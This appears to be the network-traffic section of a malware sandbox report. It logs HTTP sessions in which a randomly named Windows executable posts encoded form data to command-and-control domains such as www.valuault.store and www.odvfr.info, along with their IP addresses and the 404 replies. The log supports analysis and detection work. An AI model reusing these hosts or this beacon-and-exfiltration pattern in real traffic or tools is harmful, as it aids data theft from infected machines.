Jan 10, 2025 16:42:27.385236979 CET	853	OUT	POST /nhb9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.valuault.store Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 4f 43 64 44 33 59 55 4e 43 66 51 71 51 6a 6c 39 55 4f 70 30 53 4f 39 47 50 48 34 4e 6f 68 32 4d 4b 6b 50 33 53 63 45 38 68 77 44 38 6e 69 47 75 6f 63 6c 73 51 56 2b 47 7a 73 43 78 58 32 64 71 47 75 6b 67 39 68 69 44 68 79 63 45 32 6c 4f 52 6c 58 54 7a 36 36 61 6d 78 67 77 76 4c 4a 53 55 6e 48 53 73 56 53 7a 51 4e 2b 74 61 74 63 33 38 58 62 35 58 51 6a 74 6a 32 57 58 2f 6e 4b 38 34 44 57 4e 31 32 6d 53 36 77 56 62 71 75 6d 77 4a 64 4f 51 6f 6e 77 42 70 36 43 43 63 42 55 42 58 6b 65 4c 2b 33 4e 72 58 2b 57 7a 4e 4c 43 6a 77 68 68 Data Ascii: V8=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/OCdD3YUNCfQqQjl9UOp0SO9GPH4Noh2MKkP3ScE8hwD8niGuoclsQV+GzsCxX2dqGukg9hiDhycE2lORlXTz66amxgwvLJSUnHSsVSzQN+tatc38Xb5XQjtj2WX/nK84DWN12mS6wVbqumwJdOQonwBp6CCcBUBXkeL+3NrX+WzNLCjwhh
Jan 10, 2025 16:42:27.942660093 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49983	209.74.79.42	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:29.934814930 CET	1870	OUT	POST /nhb9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.valuault.store Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 47 43 63 78 2f 59 55 75 71 66 43 36 51 6a 35 74 55 50 70 30 53 66 39 43 6a 44 34 4e 56 65 32 50 79 6b 4a 6b 61 63 47 4e 68 77 4a 38 6e 69 45 75 6f 64 72 4d 51 36 2b 48 44 6f 43 77 37 32 64 71 47 75 6b 69 31 68 72 33 31 79 52 6b 32 6d 4c 52 6c 62 59 54 36 57 61 6d 34 58 77 76 66 33 53 6c 48 48 54 49 78 53 78 6c 68 2b 33 61 74 53 30 38 58 54 35 58 73 38 74 6a 71 38 58 38 37 6b 38 37 54 57 4f 6b 43 6c 44 49 74 43 4e 4d 4b 2f 39 35 35 59 43 2f 66 52 41 36 75 4e 48 4f 4e 35 4e 79 64 38 44 34 58 55 75 45 4c 34 6c 63 58 7a 78 41 64 31 51 48 64 34 73 48 38 69 2f 57 50 79 4a 30 4d 61 66 49 39 73 46 75 49 6b 70 39 4b 69 39 6f 45 63 6f 31 4f 4b 54 68 68 6e 69 34 62 57 43 45 76 52 58 46 30 38 41 51 59 2f 4b 4b 54 55 30 57 35 75 55 4e 79 46 78 59 6e 4e 72 44 4d 50 54 7a 36 32 34 63 50 65 51 50 34 47 71 36 4e 51 65 6e 61 6e 57 64 2f 78 63 61 57 39 70 2b 6d 72 32 37 2b 6b 68 67 72 [TRUNCATED] Data Ascii: V8=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/GCcx/YUuqfC6Qj5tUPp0Sf9CjD4NVe2PykJkacGNhwJ8niEuodrMQ6+HDoCw72dqGuki1hr31yRk2mLRlbYT6Wam4Xwvf3SlHHTIxSxlh+3atS08XT5Xs8tjq8X87k87TWOkClDItCNMK/955YC/fRA6uNHON5Nyd8D4XUuEL4lcXzxAd1QHd4sH8i/WPyJ0MafI9sFuIkp9Ki9oEco1OKThhni4bWCEvRXF08AQY/KKTU0W5uUNyFxYnNrDMPTz624cPeQP4Gq6NQenanWd/xcaW9p+mr27+khgrFl+G/Rh9U+8ycm637ekxXb2rhodORQBPV9VOx/7/crmyM1pudQcTjCgEJc0DFYR12UvaxbidCZ8zA+HoyEgxCFZ1VacjHYQu6mlhYu5b+DThYwuSoroGMChuQy5QjpixSWhuA8Xbah+DhqCAlOsymCDFrOnVOOgafU01VuAVB5W6AFEJth0qeT8iGcNK8e2OFTUDLFobX0cYAS/LLAsv1fEXfPb8i3ftS3B6dXXsnKEkh1wPgySNuqU5P9MGDWG4UgGhHkLm5vVX2ri7Kedv48eGORULUcLJ4PSNAj3EPYhrMIr0k9OMcOUspXWEQxtrcDHN5BAMQaUsA8qGMfw6RxpTmk+EvSS9+WSFVaDQsAo5fs1WVmuHkeVVyB8G/cjjcvv/HONeIlwuM0DEIslub6AyIapfUGgOSVuMpj/4GP3MZq+OEz3RO/IkkghJrgfsaOVH1KyOOv7L4PKFAAGnxzzdKCOnVTNEY59yDjFs84ooz3mfct6sYK+Sjgg9/osdrzz4O3xTv72eOSGBpliu/PUJDI2JWUgh0Z+PXCafDcBg195S7AOus//ol0yu3pK0ALxgqRqzplbsT0/2ea4tP1e3aP5FSPGhqZ9eT3p5WbG5+fcz7+Z/IxoRXA1OQIY5N8m3LoX/RnnEFmQ7N0Pk9+tx5RhxrtnWKl [TRUNCATED]
Jan 10, 2025 16:42:30.510641098 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49984	209.74.79.42	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:32.474770069 CET	577	OUT	GET /nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.valuault.store Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:42:33.077318907 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49985	47.254.140.255	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:38.126777887 CET	821	OUT	POST /rl5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.odvfr.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.odvfr.info Referer: http://www.odvfr.info/rl5p/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 79 6a 45 6c 31 6a 51 58 75 4e 4a 4b 34 76 62 48 52 57 2b 46 54 44 4e 32 47 61 42 76 2f 41 45 49 74 33 67 72 49 6f 41 32 6d 6f 61 46 52 52 61 6d 46 42 38 7a 50 4b 45 35 74 2f 4a 36 72 39 50 6e 71 6f 2b 4b 70 44 45 4a 38 6b 36 6f 53 6c 47 4a 57 63 38 6c 6c 62 53 30 52 33 52 6e 53 57 53 58 49 4e 43 48 44 48 4a 71 6c 62 7a 2f 6e 6e 4e 4b 63 47 4a 48 76 4f 41 30 2b 73 55 4a 47 53 48 54 55 7a 66 54 32 52 71 5a 4c 6d 6a 47 37 6e 77 47 43 4b 78 33 61 68 71 50 77 68 6f 6c 42 6e 35 36 69 68 43 67 65 71 4f 62 6a 57 62 44 45 4e 68 75 6e 6e 75 79 36 41 43 31 41 77 3d Data Ascii: V8=Z7P75yOjhYdj5yjEl1jQXuNJK4vbHRW+FTDN2GaBv/AEIt3grIoA2moaFRRamFB8zPKE5t/J6r9Pnqo+KpDEJ8k6oSlGJWc8llbS0R3RnSWSXINCHDHJqlbz/nnNKcGJHvOA0+sUJGSHTUzfT2RqZLmjG7nwGCKx3ahqPwholBn56ihCgeqObjWbDENhunnuy6AC1Aw=
Jan 10, 2025 16:42:38.768768072 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 10 Jan 2025 15:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2BAC77301CE331898FF2AF5DDCA8E709C19D02B8BC80A5F6DFFF4B3B7D01 Set-Cookie: _csrf=6c69579958ed0c991320ab80f32bc9ff2d20d45d2426e21589aa2e6f8f253655a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ViUHRtJmdzTkEEH8FUwB1vPvLxXyFhMS%22%3B%7D; path=/; HttpOnly Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 50 50 63 6e 44 67 71 39 73 79 30 32 37 79 52 4b 67 32 4a 34 30 66 6a 4a 51 4c 73 64 79 65 41 75 32 32 4f 4a 4c 7a 4f 6d 6b 4c 47 6d 6f 6e 55 61 6c 36 38 6f 64 43 68 36 50 70 76 53 4d 48 62 41 62 5a 53 51 4e 30 42 64 5f 62 33 46 64 5a 64 2d 71 62 58 45 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED] Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="kPPcnDgq9sy027yRKg2J40fjJQLsdyeAu22OJLzOmkLGmonUal68odCh6PpvSMHbAbZSQN0Bd_b3FdZd-qbXEQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
Jan 10, 2025 16:42:38.768816948 CET	18	IN	Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: y></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49986	47.254.140.255	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:40.675348997 CET	841	OUT	POST /rl5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.odvfr.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.odvfr.info Referer: http://www.odvfr.info/rl5p/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 52 72 45 6a 55 6a 51 41 65 4e 47 55 6f 76 62 4e 78 57 79 46 53 2f 4e 32 48 65 72 76 4e 6b 45 4a 50 76 67 73 4e 55 41 31 6d 6f 61 4e 78 52 44 35 56 42 33 7a 50 47 4d 35 6f 2f 4a 36 72 70 50 6e 72 59 2b 4b 61 62 46 54 4d 6b 34 78 43 6b 67 45 32 63 38 6c 6c 62 53 30 58 62 6f 6e 53 2b 53 58 34 39 43 42 68 6a 49 72 6c 62 30 2b 6e 6e 4e 4f 63 47 53 48 76 50 56 30 37 45 2b 4a 44 65 48 54 55 44 66 53 6a 74 70 57 4c 6d 68 62 72 6d 47 58 53 6e 66 39 61 73 2f 54 44 73 63 2b 52 4c 55 79 30 51 6f 36 38 69 6d 49 44 36 6a 54 58 46 57 2f 58 47 48 6f 5a 51 79 72 58 6b 54 46 69 35 4e 6c 79 7a 57 64 2f 75 4d 53 72 57 37 65 6a 30 41 Data Ascii: V8=Z7P75yOjhYdj5RrEjUjQAeNGUovbNxWyFS/N2HervNkEJPvgsNUA1moaNxRD5VB3zPGM5o/J6rpPnrY+KabFTMk4xCkgE2c8llbS0XbonS+SX49CBhjIrlb0+nnNOcGSHvPV07E+JDeHTUDfSjtpWLmhbrmGXSnf9as/TDsc+RLUy0Qo68imID6jTXFW/XGHoZQyrXkTFi5NlyzWd/uMSrW7ej0A
Jan 10, 2025 16:42:41.318680048 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 10 Jan 2025 15:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2B2EA5E1440509EDF1D35A7BA1797064662FBD6D8431FC423EE8E18D6B00 Set-Cookie: _csrf=46d9ec36021cecbb201271f7429b7c09ce22841aaada7658682c9161af282745a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22sFeGQzX5g4VcFsVgC3KWW-AWyMUqmh7U%22%3B%7D; path=/; HttpOnly Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 4a 50 4d 65 7a 55 41 5a 47 75 66 49 6c 5f 77 33 4a 59 37 4c 6c 57 79 36 55 5a 62 4d 49 69 45 2d 7a 61 6e 39 69 74 68 78 56 65 58 31 61 6b 38 5a 48 6f 38 58 76 67 57 43 5a 4f 61 35 57 31 4a 46 6f 47 69 45 51 77 64 79 64 4f 43 65 5f 4b 48 52 67 6e 79 41 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED] Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="5JPMezUAZGufIl_w3JY7LlWy6UZbMIiE-zan9ithxVeX1ak8ZHo8XvgWCZOa5W1JFoGiEQwdydOCe_KHRgnyAg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
Jan 10, 2025 16:42:41.318716049 CET	18	IN	Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: y></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49987	47.254.140.255	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:43.222773075 CET	1858	OUT	POST /rl5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.odvfr.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.odvfr.info Referer: http://www.odvfr.info/rl5p/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 52 72 45 6a 55 6a 51 41 65 4e 47 55 6f 76 62 4e 78 57 79 46 53 2f 4e 32 48 65 72 76 4e 73 45 4a 2b 50 67 73 71 41 41 30 6d 6f 61 48 52 52 47 35 56 42 75 7a 50 65 49 35 6f 37 5a 36 6f 52 50 6c 4e 45 2b 43 4c 62 46 47 63 6b 34 2b 69 6b 30 4a 57 63 54 6c 6c 4c 57 30 52 37 6f 6e 53 2b 53 58 36 6c 43 42 7a 48 49 70 6c 62 7a 2f 6e 6d 43 4b 63 48 63 48 76 6e 46 30 37 49 45 4a 33 69 48 54 77 76 66 55 56 35 70 4a 37 6d 2f 59 72 6d 4f 58 53 72 63 39 61 78 52 54 43 6f 79 2b 51 2f 55 68 42 39 5a 71 4f 66 2b 56 42 79 45 64 33 46 6e 71 67 79 4a 70 4a 4d 4a 75 48 59 7a 4f 32 68 52 77 6b 72 79 55 75 6a 48 45 50 47 42 4a 55 31 52 41 4e 4b 32 7a 59 53 5a 2f 54 73 4a 50 48 58 52 59 76 56 34 34 49 52 35 46 67 6f 6a 42 68 35 70 38 6f 47 65 73 74 65 49 56 35 4d 44 6c 32 75 71 4b 4b 2f 32 51 77 54 52 7a 74 42 69 66 30 57 69 6d 77 61 31 78 6d 67 47 30 58 61 57 72 78 62 50 6c 78 34 78 79 49 4a 77 70 64 30 67 35 32 61 37 71 73 78 4b 58 71 52 55 35 6d 58 77 6e 31 62 45 38 69 63 [TRUNCATED] Data Ascii: V8=Z7P75yOjhYdj5RrEjUjQAeNGUovbNxWyFS/N2HervNsEJ+PgsqAA0moaHRRG5VBuzPeI5o7Z6oRPlNE+CLbFGck4+ik0JWcTllLW0R7onS+SX6lCBzHIplbz/nmCKcHcHvnF07IEJ3iHTwvfUV5pJ7m/YrmOXSrc9axRTCoy+Q/UhB9ZqOf+VByEd3FnqgyJpJMJuHYzO2hRwkryUujHEPGBJU1RANK2zYSZ/TsJPHXRYvV44IR5FgojBh5p8oGesteIV5MDl2uqKK/2QwTRztBif0Wimwa1xmgG0XaWrxbPlx4xyIJwpd0g52a7qsxKXqRU5mXwn1bE8iclP9V/OUzlyRMZMAM6qwnB8C7QbCISxDqPsmhl1FSht7lTI+PQ+H5QOFJ6ZmBkXj25RoEEgLTT74g+DdSL6YPS2RFKuo6qDx8N3OpHNDajjhW29EaLYLWRrmPGg+txDNvl/SjYbChONIxIitaWSgAy1eUf/J5DN4QlNDZzHvUzN8SVgQuqkQ9UqX+E/DUVU5+U5wRNLyeR+a9c2OvzhG7Ccz1/N1VWL2g2HDMMfI2AxILMdM2FwDYWzd5A/H25cmTt9mDNCFljbcJwqfHDeHTQ213sIstpami8kcGmtDBRUGKm0LLX/xlilrkhl17u+/1RelJKCK78IMjy6IAnUEpkpBH+teESxlwIv+7DAeYael92RsKhT/tAvsuWgL5l84a2zdDp+ntUMXaOJXAficsoSMEEkNF02aQEmPAom3fCmVBkzPpKyeK3UVRegc7UCzWg3wzpnJOaUneRWBhOmOhtYzIKfslIkZKgdoQibhYLJaSANU8WbjAzGJh8JnfOv+AWHIhJKh/NYYvNpaMD6TceXHh3jTzdAFQ/cpYBEhmUn7HSKfCfSXqMAnvt9fDP+AUniuBgJaQE75JwEwieb6GsX5lxaFDqjqaho4AfF6MFIAIZpo/lslnAsanqXmdR4o0vX0y6kgDRHNRNSQTy3HSqRX0afAj6b0T8C [TRUNCATED]
